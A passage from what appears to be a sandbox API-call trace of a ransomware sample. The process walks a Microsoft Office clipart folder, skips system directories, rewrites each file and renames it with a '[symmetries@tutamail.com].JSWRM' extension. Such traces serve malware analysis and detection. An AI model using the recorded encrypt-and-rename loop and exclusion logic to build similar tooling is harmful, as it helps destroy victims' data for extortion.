CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0088.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0088.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0088.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.569] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xed05f07, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x92e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241019.WMF", cAlternateFileName="")) returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2=".") returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="..") returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="...") returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="windows") returned -1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="recovery") returned -1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="perflogs") returned -1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="documents and settings") returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="system volume information") returned -1 [0088.569] lstrcmpiW (lpString1="J0241019.WMF", lpString2="msocache") returned -1 [0088.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241019.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241019.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241019.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0088.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241019.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241019.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241019.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.570] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2350) returned 1 [0088.570] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x920) returned 0x20c6c0 [0088.570] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x920, lpOverlapped=0x0) returned 1 [0088.572] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.572] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x920, lpOverlapped=0x0) returned 1 [0088.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0088.573] CloseHandle (hObject=0x314) returned 1 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0088.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0088.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.573] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.574] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241037.WMF", cAlternateFileName="")) returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2=".") returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="..") returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="...") returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="windows") returned -1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="recovery") returned -1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="perflogs") returned -1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="documents and settings") returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="system volume information") returned -1 [0088.574] lstrcmpiW (lpString1="J0241037.WMF", lpString2="msocache") returned -1 [0088.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241037.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241037.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241037.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241037.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241037.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241037.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.575] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2638) returned 1 [0088.575] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa40) returned 0x20c6c0 [0088.575] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa40, lpOverlapped=0x0) returned 1 [0088.576] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.576] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa40, lpOverlapped=0x0) returned 1 [0088.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0088.577] CloseHandle (hObject=0x314) returned 1 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0088.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0088.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0088.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0088.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.578] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x926, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0241041.WMF", cAlternateFileName="")) returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2=".") returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="..") returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="...") returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="windows") returned -1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="recovery") returned -1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="perflogs") returned -1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="documents and settings") returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="system volume information") returned -1 [0088.578] lstrcmpiW (lpString1="J0241041.WMF", lpString2="msocache") returned -1 [0088.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0088.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241041.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241041.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241041.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0088.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241041.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0241041.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241041.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.579] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2342) returned 1 [0088.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x920) returned 0x20c6c0 [0088.579] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x920, lpOverlapped=0x0) returned 1 [0088.581] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.581] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x920, lpOverlapped=0x0) returned 1 [0088.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0088.581] CloseHandle (hObject=0x314) returned 1 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.582] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, 